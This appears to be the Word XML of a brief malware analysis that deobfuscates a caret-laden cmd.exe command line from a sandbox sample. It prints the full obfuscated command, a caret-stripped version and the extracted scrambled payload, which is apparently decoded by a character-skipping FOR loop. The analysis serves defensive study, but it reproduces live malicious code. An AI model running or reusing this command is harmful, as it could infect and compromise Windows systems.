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A7509" w:rsidRPr="00B325D1" w:rsidRDefault="00B325D1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk132749181"/>
      <w:r w:rsidRPr="00B325D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">                                          </w:t>
      </w:r>
      <w:r w:rsidR="00063A1A" w:rsidRPr="00B325D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">MALVAR ANALYSIS </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B710F" w:rsidRDefault="001B710F">
      <w:r w:rsidRPr="001B710F">
        <w:t>https://www.hybrid-analysis.com/sample/9a43186e72bde764614b092b55d4dfba00f528c5f0d45e6ccb56dcee8763a845</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B710F" w:rsidRDefault="001B710F"/>
    <w:p w:rsidR="00063A1A" w:rsidRDefault="00063A1A">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>INPUT :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00063A1A" w:rsidRDefault="001B710F">
      <w:r w:rsidRPr="001B710F">
        <w:t>cmd.exe /c %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>LocALappData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>:~ -3, -2%%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>pROgramdATa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>:~-5, 1%D, , /v, /R " ,, ( , (^</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>sET</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t xml:space="preserve"> ^ ^ ^ 9o^jB=od^ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>mC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t xml:space="preserve"> ^58 9i Pa^ OT^ ^B7 ^5M TC 65 AS a4 NT CR^ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>y^h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>^ ^8^6 ^BO VQ^}In}B^0{Pxhk^ics^JtZma^K^sc^Qz}zs}0^8k^e5aXZeT^kr4rbt^B;r^SW^y^X^d8yR^dU^$I^7 v^wsdC^s9q^e^7^pc^ xon^urzF^P^JX-Ox^tBZrH^e^aCLt^sMSC0;N^6^)6LW^d^Ldr^TR^a^2$4N^(O0eymluL^i^m^M^fZno^JAtX^xeLjv^FpaeKs^yr.aYp9^KvvQ^sk5$v4;^Q^p^)V^oyCd^d^FEowf^Ba^weCZ^s1an^Aroq^Zpg^K^s^HWebMr^o^X.l^jY^w^3I^e^b^u1u$L^p^(8ceJkt^hs^i^uQrxCwuV.P5^pEfvuEs^F9^$VJ;^8c^1rZ I^3=^</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>Yz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t xml:space="preserve">^ ^q^HeCFp^B^tyW^e^tfV.F3p3ZvwWsKe^$l^6^;D1^)^5v^(MnnU^Se^s^tpAvo5k.HIpnzv5m^sHC$^Og{q^j^ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>Cx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t xml:space="preserve">^)C^S0pO01^J^2sn </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>V^wq^lN^ev^i-DI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t xml:space="preserve"> ^Lts5yuP2t^WXa 4^to^Q^SJ^L.CpYA^QIsEurk$x^7^(v5 yV^f9wIFM;UF^)</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>lJ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>^( ^I^dg^Hn^Qx^eB5siI^.kuY^i1I^hSu^Gy$C^M;iR^)bL^0dc,^bjv^a^HXk^0^PnI$^a^m,aD'ME^THNEN^j^G^Pw'tX^(lGn^obexF^p9z^ogx.c^OYyR^IIhuS^p^$G0^{yAy^HCr^3TtA^x^{Dv^)0^YFubQ^o^Ui^B^e$cG^ O9ni0^iV^a ^5^fvm^4XKMPHJ^$E5^(o^q^h^ygcv^pavBeAQrN^PoUkffh;IF^'tz^mWVa^FRe^mEr^G^wtecsU^e^.GzbAldu4^oS^6^dC3a^F7^'^Z9 9kmNFo5rc3^T^-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>i^h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t xml:space="preserve"> SXthQcK^ke^Hi^jx^obwVO^bt-SbwN^7^eGSNJG mb=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>hA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t xml:space="preserve"> JZp^l^qv4ysX^P$vz;P^f^'6Gp^Un^t^Hk^tNWhG7lPJmr^wx^4 .^DV^2RqlOwm^2jxjV^s^Op^mD^x'vb nCmclo^3^zcP4-m^w U^L^t^I4c5^2eSv^jBm^b^W^fO^d7-^f^2wL^I^ev3NrT=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>bS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t xml:space="preserve"> giYMNIq2^uK^W^$3^G;^DR^)^lS'B^j^eXZxbZ^ea3.OGwtEUajzrV\sv'jR+Rv^)^U5^(E^ hxC^t2^Wa^7a^PBzpaUmAO^ev^UT^e^ t6^ae^wiGk^M:bC:ki^]DPhJftR0^anvPOq^.^3c^O3^FIrG.^8BmiMe8wttksHoyhV^SKc[^j^X^( t=^4n^W9p^d^2^KRVY^$G ^;es^) ^P^'QW@aX'^Ow^(^aQt^TP^i7^dl^b7pa5^Ss5.4t'3^KgzV^HMLiE4^a^UAD49ibjf0j/ERm^dmo^ZTcQe.e^L^gRJ^b3^Y^m^wir1j^a^MKf6^geDR.fVachiTXrTMaN5g^G4l9Gu^8vbUN-^5csC8^a5^XgP^Yor^Ui^2WbO^4/1o/fN:03pa^St^Q^Y^tzd^h4v@^Zmq^Hc^sFP/Ikm^Sn^o^e^fc9r.V^PzY^mb^gYa9RsrOg^mnr^QRbb^m.UIw^h^P^w3yw5t/V7/AV:^QDp^o^ltpQtW^oh2S^@Cimr^hVl^6^BkM0MFad^iS^15/jXz2tiUYb^BU.T6y^Ayc^7^3nKXe86gHTacD^eJ^7v4YiyothZaF9e7grDNc^48^.dAw^Q3wLh^wt^K/Pf/^3Z^:Ujpr^Mt^Yh^tZ^shRA^@3^i^6cbJ^qbW^Q1NDH/^q7^thAe^pCnD^1.^s^h^o9Vn7Ya^O^ujy^q^uyW^diengRaWemoc/50/ ^G:mdpAUt^HNtw^4^h1x^@ZCtNO7Uo8NjW^K^D^dyZ^x^eUYGL/KBm^kW^o^UKcUV^.^LSa^xy^iB^y^dC^ZeGZm^jva^ hm4m^io^5hEnaAPmjG/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>iZ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>h^J</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>:^ ppsNt^J^h^t4 ^hBR'bC^=gc^Fm^x^Qu5ixU^$0B;^p0'dm^d4^I^f^gLr^Xb^'pU=4hi^kJ^Y1MBeD^$N^G HilK9lQw^e^s^BhrHsDIrSXe^Q^Dw^W^fojN^p) , , , , ,)&amp; ,,, ^For, , , /^l , %^3 , ,, ^IN,, (+16^40 ^, ^ -^3^ ^,+^2^ ) , ^</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>d^O</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>, , , ( ,(, , S^E^T c2^zZ=!c2^zZ!!9o^jB:~ %^3,1!) , , ,)&amp;&amp; , , , IF , ,%^3 ,, , == , , ^2 ,, ( , ( (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>ca^lL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>, , %c2^zZ:~ +6% ) , , , , , ) ,)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B710F" w:rsidRDefault="001B710F"/>
    <w:p w:rsidR="001B710F" w:rsidRDefault="001B710F"/>
    <w:p w:rsidR="001B710F" w:rsidRDefault="001B710F"/>
    <w:p w:rsidR="001B710F" w:rsidRDefault="001B710F"/>
    <w:p w:rsidR="001B710F" w:rsidRDefault="001B710F">
      <w:r>
        <w:t xml:space="preserve">Replacing caps with empty </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B710F" w:rsidRDefault="001B710F"/>
    <w:p w:rsidR="001B710F" w:rsidRDefault="001B710F">
      <w:r w:rsidRPr="001B710F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68C93596" wp14:editId="1FF50D8B">
            <wp:extent cx="5731510" cy="3241040"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="109981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157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0F" w:rsidRDefault="001B710F"/>
    <w:p w:rsidR="001B710F" w:rsidRDefault="001B710F"/>
    <w:p w:rsidR="001B710F" w:rsidRDefault="001B710F"/>
    <w:p w:rsidR="001B710F" w:rsidRDefault="001B710F"/>
    <w:p w:rsidR="001B710F" w:rsidRDefault="001B710F"/>
    <w:p w:rsidR="001B710F" w:rsidRDefault="001B710F"/>
    <w:p w:rsidR="001B710F" w:rsidRDefault="001B710F"/>
    <w:p w:rsidR="001B710F" w:rsidRDefault="001B710F"/>
    <w:p w:rsidR="001B710F" w:rsidRDefault="001B710F"/>
    <w:p w:rsidR="001B710F" w:rsidRDefault="001B710F"/>
    <w:p w:rsidR="001B710F" w:rsidRDefault="001B710F"/>
    <w:p w:rsidR="001B710F" w:rsidRDefault="001B710F"/>
    <w:p w:rsidR="001B710F" w:rsidRDefault="001B710F"/>
    <w:p w:rsidR="001B710F" w:rsidRDefault="001B710F"/>
    <w:p w:rsidR="001B710F" w:rsidRDefault="001B710F"/>
    <w:p w:rsidR="001B710F" w:rsidRDefault="001B710F"/>
    <w:p w:rsidR="001B710F" w:rsidRDefault="001B710F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">New Payload generated by OUTPUT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>is :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="001B710F" w:rsidRDefault="001B710F">
      <w:r w:rsidRPr="001B710F">
        <w:t>cmd.exe /c %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>LocALappData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>:~ -3, -2%%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>pROgramdATa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>:~-5, 1%D, , /v, /R " ,, ( , (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>sET</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t xml:space="preserve">    9ojB=od </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>mC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t xml:space="preserve"> 58 9i Pa OT B7 5M TC 65 AS a4 NT CR </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>yh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t xml:space="preserve"> 86 BO VQ}In}B0{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>PxhkicsJtZmaKscQz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>}zs}08ke5aXZeTkr4rbtB;rSWyXd8yRdU$I7 vwsdCs9qe7pc xonurzFPJX-OxtBZrHeaCLtsMSC0;N6)6LWdLdrTRa2$4N(O0eymluLimMfZnoJAtXxeLjvFpaeKsyr.aYp9KvvQsk5$v4;Qp)VoyCddFEowfBaweCZs1anAroqZpgKsHWebMroX.ljYw3Iebu1u$Lp(8ceJkthsiuQrxCwuV.P5pEfvuEsF9$VJ;8c1rZ I3=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>Yz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t xml:space="preserve"> qHeCFpBtyWetfV.F3p3ZvwWsKe$l6;D1)5v(MnnUSestpAvo5k.HIpnzv5msHC$Og{qj </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>Cx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t xml:space="preserve">)CS0pO01J2sn </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>VwqlNevi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>-DI Lts5yuP2tWXa 4toQSJL.CpYAQIsEurk$x7(v5 yVf9wIFM;UF)</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>lJ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>( IdgHnQxeB5siI.kuYi1IhSuGy$CM;iR)bL0dc,bjvaHXk0PnI$am,aD'METHNENjGPw'tX(lGnobexFp9zogx.cOYyRIIhuSp$G0{yAyHCr3TtAx{Dv)0YFubQoUiBe$cG O9ni0iVa 5fvm4XKMPHJ$E5(oqhygcvpavBeAQrNPoUkffh;IF'tzmWVaFRemErGwtecsUe.GzbAldu4oS6dC3aF7'Z9 9kmNFo5rc3T-ih SXthQcKkeHijxobwVObt-SbwN7eGSNJG mb=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>hA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t xml:space="preserve"> JZplqv4ysXP$vz;Pf'6GpUntHktNWhG7lPJmrwx4 .DV2RqlOwm2jxjVsOpmDx'vb nCmclo3zcP4-mw ULtI4c52eSvjBmbWfOd7-f2wLIev3NrT=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>bS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t xml:space="preserve"> giYMNIq2uKW$3G;DR)lS'BjeXZxbZea3.OGwtEUajzrV\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>sv'jR+Rv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>)U5(E hxCt2Wa7aPBzpaUmAOevUTe t6aewiGkM:bC:ki]DPhJftR0anvPOq.3cO3FIrG.8BmiMe8wttksHoyhVSKc[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>jX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>( t=4nW9pd2KRVY$G ;es) P'QW@aX'Ow(aQtTPi7dlb7pa5Ss5.4t'3KgzVHMLiE4aUAD49ibjf0j/ERmdmoZTcQe.eLgRJb3Ymwir1jaMKf6geDR.fVachiTXrTMaN5gG4l9Gu8vbUN-5csC8a5XgPYorUi2WbO4/1o/fN:03paStQYtzdh4v@ZmqHcsFP/IkmSnoefc9r.VPzYmbgYa9RsrOgmnrQRbbm.UIwhPw3yw5t/V7/AV:QDpoltpQtWoh2S@CimrhVl6BkM0MFadiS15/jXz2tiUYbBU.T6yAyc73nKXe86gHTacDeJ7v4YiyothZaF9e7grDNc48.dAwQ3wLhwtK/Pf/3Z:UjprMtYhtZshRA@3i6cbJqbWQ1NDH/q7thAepCnD1.sho9Vn7YaOujyquyWdiengRaWemoc/50/ G:mdpAUtHNtw4h1x@ZCtNO7Uo8NjWKDdyZxeUYGL/KBmkWoUKcUV.LSaxyiBydCZeGZmjva hm4mio5hEnaAPmjG/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>iZ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>hJ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t xml:space="preserve">: ppsNtJht4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>hBR'bC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t xml:space="preserve">=gcFmxQu5ixU$0B;p0'dmd4IfgLrXb'pU=4hikJY1MBeD$NG HilK9lQwesBhrHsDIrSXeQDwWfojNp) , , , , ,)&amp; ,,, For, , , /l , %3 , ,, IN,, (+1640 ,  -3 ,+2 ) , </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>dO</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>, , , ( ,(, , SET c2zZ=!c2zZ!!9ojB:~ %3,1!) , , ,)&amp;&amp; , , , IF , ,%3 ,, , == , , 2 ,, ( , ( (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>calL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>, , %c2zZ:~ +6% ) , , , , , ) ,)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B710F" w:rsidRDefault="001B710F"/>
    <w:p w:rsidR="001B710F" w:rsidRDefault="001B710F">
      <w:r>
        <w:t xml:space="preserve">Take payload from od </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">……. To until SET command ends </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A4187" w:rsidRDefault="002A4187">
      <w:r w:rsidRPr="001B710F">
        <w:t xml:space="preserve">od </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>mC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t xml:space="preserve"> 58 9i Pa OT B7 5M TC 65 AS a4 NT CR </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>yh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t xml:space="preserve"> 86 BO VQ}In}B0{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>PxhkicsJtZmaKscQz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>}zs}08ke5aXZeTkr4rbtB;rSWyXd8yRdU$I7 vwsdCs9qe7pc xonurzFPJX-OxtBZrHeaCLtsMSC0;N6)6LWdLdrTRa2$4N(O0eymluLimMfZnoJAtXxeLjvFpaeKsyr.aYp9KvvQsk5$v4;Qp)VoyCddFEowfBaweCZs1anAroqZpgKsHWebMroX.ljYw3Iebu1u$Lp(8ceJkthsiuQrxCwuV.P5pEfvuEsF9$VJ;8c1rZ I3=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>Yz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t xml:space="preserve"> qHeCFpBtyWetfV.F3p3ZvwWsKe$l6;D1)5v(MnnUSestpAvo5k.HIpnzv5msHC$Og{qj </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>Cx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t xml:space="preserve">)CS0pO01J2sn </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>VwqlNevi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>-DI Lts5yuP2tWXa 4toQSJL.CpYAQIsEurk$x7(v5 yVf9wIFM;UF)</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>lJ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>( IdgHnQxeB5siI.kuYi1IhSuGy$CM;iR)bL0dc,bjvaHXk0PnI$am,aD'METHNENjGPw'tX(lGnobexFp9zogx.cOYyRIIhuSp$G0{yAyHCr3TtAx{Dv)0YFubQoUiBe$cG O9ni0iVa 5fvm4XKMPHJ$E5(oqhygcvpavBeAQrNPoUkffh;IF'tzmWVaFRemErGwtecsUe.GzbAldu4oS6dC3aF7'Z9 9kmNFo5rc3T-ih SXthQcKkeHijxobwVObt-SbwN7eGSNJG mb=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>hA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t xml:space="preserve"> JZplqv4ysXP$vz;Pf'6GpUntHktNWhG7lPJmrwx4 .DV2RqlOwm2jxjVsOpmDx'vb nCmclo3zcP4-mw ULtI4c52eSvjBmbWfOd7-f2wLIev3NrT=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>bS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t xml:space="preserve"> giYMNIq2uKW$3G;DR)lS'BjeXZxbZea3.OGwtEUajzrV\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>sv'jR+Rv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>)U5(E hxCt2Wa7aPBzpaUmAOevUTe t6aewiGkM:bC:ki]DPhJftR0anvPOq.3cO3FIrG.8BmiMe8wttksHoyhVSKc[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>jX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>( t=4nW9pd2KRVY$G ;es) P'QW@aX'Ow(aQtTPi7dlb7pa5Ss5.4t'3KgzVHMLiE4aUAD49ibjf0j/ERmdmoZTcQe.eLgRJb3Ymwir1jaMKf6geDR.fVachiTXrTMaN5gG4l9Gu8vbUN-5csC8a5XgPYorUi2WbO4/1o/fN:03paStQYtzdh4v@ZmqHcsFP/IkmSnoefc9r.VPzYmbgYa9RsrOgmnrQR</w:t>
      </w:r>
      <w:r w:rsidRPr="001B710F">
        <w:lastRenderedPageBreak/>
        <w:t>bbm.UIwhPw3yw5t/V7/AV:QDpoltpQtWoh2S@CimrhVl6BkM0MFadiS15/jXz2tiUYbBU.T6yAyc73nKXe86gHTacDeJ7v4YiyothZaF9e7grDNc48.dAwQ3wLhwtK/Pf/3Z:UjprMtYhtZshRA@3i6cbJqbWQ1NDH/q7thAepCnD1.sho9Vn7YaOujyquyWdiengRaWemoc/50/ G:mdpAUtHNtw4h1x@ZCtNO7Uo8NjWKDdyZxeUYGL/KBmkWoUKcUV.LSaxyiBydCZeGZmjva hm4mio5hEnaAPmjG/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>iZ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>hJ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t xml:space="preserve">: ppsNtJht4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>hBR'bC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B710F">
        <w:t>=gcFmxQu5ixU$0B;p0'dmd4IfgLrXb'pU=4hikJY1MBeD$NG HilK9lQwesBhrHsDIrSXeQDwWfojNp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A4187" w:rsidRDefault="002A4187">
      <w:r>
        <w:t xml:space="preserve">Character Count of this </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>payload :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="002A4187" w:rsidRDefault="002A4187">
      <w:r w:rsidRPr="002A4187">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5137DF15" wp14:editId="3865C371">
            <wp:extent cx="2194750" cy="2095682"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="208040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029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187" w:rsidRDefault="002A4187">
      <w:r>
        <w:t xml:space="preserve">Characters (With spaces matches with the Iteration given in source code </w:t>
      </w:r>
      <w:r w:rsidRPr="001B710F">
        <w:t xml:space="preserve"> (+1640 ,  -3 ,+2 )</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as it counted from 0 so ends at 1640 ,In character count from word is  1 to 1641 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A4187" w:rsidRDefault="002A4187">
      <w:r w:rsidRPr="002A4187">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D5784F2" wp14:editId="58BED394">
            <wp:extent cx="5731510" cy="3331845"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="52610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024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187" w:rsidRDefault="002A4187"/>
    <w:p w:rsidR="002A4187" w:rsidRDefault="002A4187"/>
